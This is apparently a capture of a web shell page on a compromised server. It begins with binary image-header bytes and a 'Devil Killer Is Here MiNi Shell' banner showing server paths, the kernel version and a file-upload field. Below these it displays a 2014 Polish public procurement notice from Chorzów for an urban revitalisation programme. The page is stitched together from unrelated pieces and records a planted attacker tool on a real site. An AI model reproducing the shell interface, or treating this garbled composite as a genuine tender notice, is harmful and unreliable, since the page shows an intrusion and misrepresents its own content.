JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140303/70188-N-2014.html

<p class="kh_header"><b>Chorzów: Opracowanie Zintegrowanego  Programu Rewitalizacji Obszaru Funkcjonalnego Chorzowa , Rudy  Śląskiej i  Świętochłowic.</b><br>
<b>Numer ogłoszenia: 70188 - 2014; data zamieszczenia: 03.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Chorzów, Biuro Zamówień Publicznych , Rynek 1, 41-500 Chorzów, woj. śląskie, tel. 32 2-411-261...9, faks 32 2-417-458.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chorzow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Zintegrowanego  Programu Rewitalizacji Obszaru Funkcjonalnego Chorzowa , Rudy  Śląskiej i  Świętochłowic..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie podzielono  na dwie części:
Część I: Wykonanie Lokalnego Programu Rewitalizacji Chorzowa  do 2030 r.  obejmuje  opracowanie dokumentu podległego do strategii rozwoju miasta zintegrowanego z ustaleniami planu miejscowego (MPZP). Lokalny Program Rewitalizacji (LPR) winien być programem operacyjnym. Program powinien składać się z dwóch komponentów:
1.klasycznego - obejmującego działania związane z poprawą stanu szeroko rozumianej  tkanki miejskiej w obszarze kryzysowym - np. budynki i budowle wymagające generalnego remontu potrzeby termomodernizacyjne, substandardy  architektoniczne (np. zdewastowana zabudowa barakowa, magazynowa itp.) , tereny nieużytków (najczęściej poprzemysłowych), uporządkowanie i uzupełnienie  zabudowy, potrzeby budowy ,uzupełnienia  lub odnowy przestrzeni publicznych, terenów zieleni itp., budowa lub poprawa jakości i standardu dróg i chodników lokalnych,
2.społeczno-gospodarczego - obejmującego działania związane z ograniczeniem degradacji społeczno-gospodarczej poprzez walkę z wykluczeniem społecznym ( bezrobocie i ubóstwo ), poprawą bezpieczeństwa, zwiększeniem potencjału gospodarczego.  
Lokalny Program Rewitalizacji powinny mieć następującą strukturę :
1.Streszczenie,
2.Diagnozę, powinna zawierać kontekst w zakresie elementu polityki strategicznej miasta, konieczne jest określenie  w jaki sposób delimitowano obszary kryzysowe miasta. 
3.Analizę przyczyn degradacji i charakterystykę sytuacji na obszarach objętych  LPR, w tym także nawiązania do szerszej struktury i procesów rozwojowych miasta. Analiza powinna być prowadzona w obu komponentach i przede wszystkim charakteryzować zjawiska kryzysowe. W analizie powinni zostać  zidentyfikowani  potencjalni partnerzy i interesariusze  projektu.
4.Opis najważniejszych potencjałów ,wyzwań ,problemów obszarów objętych LPR 
z udziałem obu komponentów. Doprecyzowanie celów szczegółowych i priorytetów  rewitalizacji. 
5.Cele szczegółowe rewitalizacji wraz z narzędziami ich rewitalizacji ,a także system zarządzania rewitalizacją programu.
6.Środki realizacji celów (z rozbiciem na oba komponenty i wskazaniem ich komplementarności w przypadku jej występowania),opracowanie planu rzeczowo- finansowego zadania dla obszarów zrewitalizowanych, w podziale na lata i zakres przedmiotowy oraz wysokość i źródła finansowania. Zasadniczą częścią opracowania powinny być tabele szczegółowo  opisujące planowane projekty, czas ich realizacji i poszczególne etapy ,oczekiwane rezultaty (wskaźniki produktu, rezultatu i oddziaływania ), niezbędne nakłady wraz informacją o zakładanych źródłach finansowania, lista podmiotów uczestniczących w realizacji zadania. Tabela winna być przygotowana w taki sposób, aby łatwo można było wprowadzać zmiany w jej treści. Projekty zupełnie niezależne od władz lokalnych -powinny być przedstawiane , jako lista dobrowolnych partnerstw. Ostatnią częścią tej jednostki LPR  powinno być przedstawienie  powiązań miedzy poszczególnymi projektami .
7.Wskaźniki LPR.
8. Załączniki mapowe i inne ilustrujące wyznaczone obszary kryzysowe miasta.
9.Instrumenty wdrażania programu i komunikacji społecznej obejmujące formę zarządzania  realizacją LPR-u ,system informacji i promocji ,system budowania  i wspierania partnerstw, system monitorowania  procesu rewitalizacji. 
10.Wnioski
W trakcie realizacji LPR należy uwzględnić: roboczą wersję Miniprogramu Rewitalizacji Chorzowa II stanowiący załącznik nr 8, projekt wytycznych w sprawie przygotowania  Lokalnych Programów  Rewitalizacji i uwzględniać kolejne jego aktualizacje stanowiący załącznik nr 9, opracowany przez Urząd Marszałkowski Województwa Śląskiego, założenia końcowe dla Strategii Rozwoju Chorzowa do 2030 r. (wraz z dokumentem obowiązującym, który powstanie w czasie realizacji tego zamówienia) stanowiące załącznik nr 10 oraz Zintegrowane podejście do problemów obszarów funkcjonalnych na przykładzie  Chorzowa, Rudy Śląskiej i Świętochłowic - określenie obszaru funkcjonalnego poprzez jego identyfikacje i delimitację zamieszczone na stronie internetowej www.miasto3com 
 Wykonawca winien przeprowadzić postępowanie związane z Strategiczną Oceną Oddziaływania na Środowisko (SOOŚ) wynikającą z zapisów ustawy z dnia 03.10.2008  r. o udostępnianiu  informacji o środowisku i jego ochronie ,udziale społeczeństwa w ochronie środowiska  oraz o ocenach oddziaływania na środowisko (Dz. U. 2013, 1235 z późn. zm.), a w szczególności z art.47 ww ustawy wskazującym, że  przeprowadzenie SOOŚ jest wymagane także w przypadku dokumentów  innych niż te wymienione w art.46 ,jeżeli w uzgodnieniu z właściwym organem ,o którym mowa art.57 ,organ opracowujący projekt dokumentu stwierdzi ,że wyznaczają one  ramy dla późniejszej realizacji przedsięwzięć mogących znacząco oddziaływać na środowisko  lub ,że realizacja  postanowień tych dokumentów może spowodować znaczące oddziaływanie na środowisko i w tym przypadku zakłada się taką ewentualność. Wymóg SOOŚ powoduje konieczność uzgodnienie przez Wykonawcę w porozumieniu z Zamawiającym  zakresu i stopnia szczegółowości informacji wymaganych w prognozie oddziaływania na środowisko. Sporządzenie Prognozy Oddziaływania na Środowisko powinno zawsze odpowiadać wymogom wynikającym z art.51 ust.2 ww. ustawy , przy zachowaniu warunków ,o których mowa w art.52 ust.1 i 2 ustawy. Organami właściwymi  w sprawach opiniowania i uzgadniania w ramach SOOŚ są w tym przypadku Regionalny Dyrektor Ochrony Środowiska i Państwowy Wojewódzki Inspektor Sanitarny. Zgodnie z treścią art.53 Organ opracowujący  projekt dokumentu ,o którym mowa w art.46 lub art.47 , uzgadnia z właściwymi organami zakres i stopień szczegółowości informacji wymaganych w prognozie oddziaływania na środowisko. Uzgodnienia dokonuje się w terminie 30 dni od dnia otrzymania wniosku o uzgodnienie.
Organ opracowujący projekt dokumentu wraz z prognozą oddziaływania na środowisko poddaje go opiniowaniu przez właściwe organy, które w terminie 30 dni  od dnia otrzymania takiego wniosku wydaja opinię. Organ opracowujący projekt takiego dokumentu zapewnia możliwość udziału społeczeństwa  w tym postępowaniu.
 Zasady udziału społeczeństwa w podejmowaniu decyzji określają  art.33-art.38 ww. ustawy, a udział społeczeństwa w opracowywaniu dokumentów określają art.39- art.43 ww. ustawy.
Wykonawca powinien zapewnić 1 spotkanie konsultacyjne z udziałem dwóch moderatorów trwające do 5 godzin, wraz z wynajmem sali, na to  spotkanie Wykonawca zapewnia catering dla około 70 osób (w formie napojów woda mineralna, soki, kawa , herbata wraz z dodatkami i tzw. słodki poczęstunek, który może obejmować również owoce)  oraz posiłek lunchowy, dla którego dopuszcza się kanapki z częściowym przystawaniem ich   dla wegetarian przy założeniu około 4 kanapek dla jednej osoby. Wykonawca zapewnia materiały dla potrzeb konsultacji i materiały piśmienne, jak  również informacje  o projekcie wraz z wykonaniem plakatów i ich rozplakatowaniem  .Plakaty będą zawierały informacje o projekcie. Konsultacje winny się odbyć do III kwartału 2014 r. W przypadku pozostałych ewentualnych konsultacji Zamawiający może udostępnić jedynie nieodpłatnie  salę posiedzeń w budynku UM Chorzowa. Wykonawca  LPR zobowiązany będzie w 2015  r. do zaprezentowania na konferencji prezentacji ilustrującej i opisującej kluczowe założenia LPR. Rezultaty konsultacji winny być wykorzystane w następujący sposób:
1.Wykonawca utrwala wyniki konsultacji - po konsultacjach musi  powstać  protokół lub notatka , jak również materiał fotograficzny. Dokumenty te zostaną udostępnione na stronie internetowej projektu.
2.Zamawiający upubliczni  wyniki konsultacji oraz przedstawi  wyniki analizy materiału powstałego w czasie konsultacji, które sporządzi Wykonawca. 
Zamawiający  zapewni zamieszczenie na stronie internetowej projektu niezbędnych materiałów dla potrzeb realizacji opracowania. Wykonawca dla  tej części zamówienia sporządzi następujące dokumenty :
Lokalny Program Rewitalizacji Chorzowa  do 2030 roku wraz z ewentualnymi dokumentami związanym z SOOŚ winny być przygotowana w formacie A-4 zawierać powyżej 100 stron (w tym materiał zdjęciowy kolorowy, schematy, tabele, ankiety. plany ,mapy itp.) a jego projekt i skład graficzny przygotowany do druku zostanie zaakceptowany przez Zamawiającego. Zamawiający zakłada wydrukowanie 10  egzemplarzy Lokalnego Programu Rewitalizacji Chorzowa do 2030 roku. Każdy egzemplarz wyposażony będzie dodatkowo w nośnik elektroniczny zawierający pełną treść dokumentu. Zamawiający otrzyma od Wykonawcy  4 egzemplarze  LPR na 4 sztukach nośników elektronicznych w formie edytowalnej i nieedytowalnej przy użyciu powszechnie dostępnego programu. Dodatkowo Wykonawca wykona 4 egzemplarze  prezentacji  multimedialnych o minimalnej ilości  30 sztuk slajdów na 4 sztukach nośników  elektronicznych w formacie edytowalnym  i nieedytowalnym w dostępnym powszechnie  oprogramowaniu np. 
w programie  Power Point. Zamawiający udostępni Wykonawcy logotypy, które muszą być zamieszczone w Lokalnym Programie Rewitalizacji i na nośniku elektronicznym. Zarówno pełny dokument LPR oraz prezentacja multimedialna  mogą zostać udostępnione na stronie internetowej miasta Chorzowa.
Część II: Wykonanie Zintegrowanego  Programu Rewitalizacji Obszaru Funkcjonalnego (ZPROF) Chorzowa , Rudy  Śląskiej i  Świętochłowic do 2030 roku obejmuje analizę dokumentów sporządzonych  dla potrzeb projektu -Zintegrowane  podejście do problemów  obszarów funkcjonalnych  na przykładzie Chorzowa, Rudy Śląskiej i Świętochłowic - w postaci  3 lokalnych programów rewitalizacji tych miast, z których  Lokalny Program Rewitalizacji  Chorzowa do 2030 roku zostanie wykonany  02.09.2014 r. w ramach niniejszego zamówienia, a  Lokalne Pogramy Rewitalizacji Rudy Śląskiej i Świętochłowic zostaną udostępnione Wykonawcy w terminie do 03.09.2014 r.  Na podstawie tych dokumentów Wykonawca przygotuje -Zintegrowany Program Rewitalizacji Obszaru Funkcjonalnego Chorzowa ,Rudy Śląskiej i Świętochłowic do 2030 r.- w terminie do 03.10.2014 r. mając na względzie ,że miejski obszar funkcjonalny (MOF) jest układem osadniczym  ciągłym przestrzennie ,złożonym z odrębnych administracyjnie  jednostek. Obejmuje  zwarty obszar miejski  oraz powiązaną z nim  funkcjonalnie  strefę zurbanizowaną . administracyjnie obszary te  mogą obejmować  gminy miejskie. MOF można podzielić na 4  podtypy, a w przypadku obszaru funkcjonalnego  objętego niniejszym zamówieniem najbardziej odpowiedni  jest podtyp związany z ośrodkiem subregionalnym (pow.50 000 mieszkańców ), gdyż dotyczy 3 miast na prawach powiatu, z których każde  liczebnie  przewyższa  50 tys. mieszkańców. Wszystkie trzy miasta  pełnią ważną rolę, jako ośrodki koncentrujące  funkcje gospodarcze i społeczne  oraz są miejscem dostarczania, w uzupełnieniu do oferty miast   regionalnych, usług  publicznych istotnych  z perspektywy mieszkańców.
ZPROF winien  być wykonany w postaci dokumentu ,o objętości co najmniej 70 stron maszynopisu  formatu kartek A-4 w formie 4 egzemplarzy drukowanych ,oraz w formie 4 egzemplarzy na 4 sztukach nośników elektronicznych w formie edytowalnej i nieedytowalnej ,przy użyciu powszechnie dostępnego programu .Dodatkowo  Wykonawca wykona 4 egzemplarze prezentacji multimedialnych  o minimalnej ilości  30 sztuk slajdów na 4 sztukach  nośników elektronicznych w formacie edytowalnym  i nieedytowalnym  w dostępnym powszechnie  oprogramowaniu np. PowerPoint.  
W trakcie prac nad dwoma programami Wykonawca będzie przedstawiał i uzgadniał 
z Zamawiającym wersje robocze dokumentów stanowiące przedmiot zamówienia, jak również treść opracowanej przez Wykonawcę ankiety  wykonanej  w taki sposób ,aby można je było zamieścić na stronie (ach) internetowych.
Przy opracowaniu przedmiotu zamówienia Wykonawca odpowiada za merytoryczną stronę opracowania, błędy literowe, układ i zawartość. W przypadku stwierdzenia jakichkolwiek błędów w opracowaniu Wykonawca uwzględni uwagi Zamawiającego. 
Prawa autorskie: Wykonawca przeniesie nieodpłatnie na Zamawiającego wyłączne prawa autorskie do opracowania. 
Uwaga:
Do oferty Wykonawca winien dołączyć opis - konspekt przedstawiający sposób realizacji przedmiotu zamówienia wraz z harmonogramem terminowo-rzeczowym przy założeniu, że zostanie wykonana SOOŚ realizacji prac w ujęciu tabelarycznym w celu umożliwienia Zamawiającemu dokonania oceny jego zawartości merytorycznej. Konspekt powinien odpowiadać strukturze przedmiotu zamówienia i zawierać max 10 stron..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 73.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 03.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w.w. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia (załącznik nr 4 do SIWZ). Nie wykazanie spełniania w.w. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w.w. warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie w.w. warunku, jeżeli Wykonawca wykaże się wykonaniem przynajmniej jednej  usługi odpowiadającej swoim rodzajem usłudze stanowiącej przedmiot zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Poprzez usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia Zamawiający rozumie wykonanie w sposób należyty usługi w postaci :
Przygotowania ,co najmniej jednej  strategii rozwoju  lub innych dokumentów strategicznych lub innego dokumentu programowego dla co najmniej jednego dużego obszaru zurbanizowanego (np. miasta powyżej 50 000 mieszkańców, województwa, kraju).
Powyższe opracowania  mogą być wykonane w ramach jednego  zadania lub odrębnych zadań.
Ocena spełniania w.w. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów ( załączniki nr 4 i 5 do SIWZ).
Nie wykazanie spełniania w/w warunku skutkować będzie wykluczeniem Wykonawcy 
z  postępowania zgodnie z art. 24 ust. 2 pkt. 4 ustawy Pzp. Wykonawcy wspólnie ubiegający się  o udzielenie zamówienia w/w warunek spełniają łącznie. Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. 
W tym celu Wykonawca winien dołączyć do oferty w szczególności pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania 
z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w.w. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia (załącznik nr 4 do SIWZ). Nie wykazanie spełniania w.w. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w.w. warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w.w. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia (załącznik nr 4 do SIWZ). Nie wykazanie spełniania w.w. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w.w. warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania w.w. warunku zostanie dokonana według formuły: spełnia - nie spełnia na podstawie załączonego do oferty oświadczenia (załącznik nr 4 do SIWZ). Nie wykazanie spełniania w.w. warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w.w. warunek spełniają łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy.
2. Oświadczenie o spełnianiu warunku wynikającego z  art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - załącznik nr 4, (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy składają łącznie). 
3. Stosowne pełnomocnictwo w sytuacjach, w których uprawnienie do podpisania oferty nie wynika z zamieszczonego dokumentu. Pełnomocnictwo do reprezentowania danego podmiotu w postępowaniu o udzielenie zamówienia publicznego powinno zostać złożone w oryginale lub kopii poświadczonej notarialnie.
4. Pełnomocnictwo podmiotów występujących wspólnie  wskazujące, że osoba występująca w imieniu tych podmiotów jest upoważniona do ich reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo  powinno zostać złożone w oryginale lub kopii poświadczonej notarialnie.
5. Opis - konspekt przedstawiający sposób realizacji przedmiotu zamówienia wraz z harmonogramem terminowo-rzeczowym przy założeniu, że zostanie wykonana SOOŚ realizacji prac w ujęciu tabelarycznym w celu umożliwienia Zamawiającemu dokonania oceny jego zawartości merytorycznej. Konspekt powinien odpowiadać strukturze przedmiotu zamówienia i zawierać max 10 stron.
6. Wykaz informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów art. 4 ust. 4 ustawy z dnia 16 kwietnia 1993 roku o zwalczaniu nieuczciwej konkurencji, które wykonawca pragnie zastrzec przed dostępem dla innych uczestników postępowania z podaniem podstawy prawnej.
7. Oświadczenie Wykonawcy dotyczące części zamówienia, których wykonanie powierzy podwykonawcom lub podanie przez Wykonawcę nazw (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp ( jeżeli dotyczy).  W przypadku braku informacji zamawiający uzna, że wykonawca wykona zamówienie samodzielnie.    
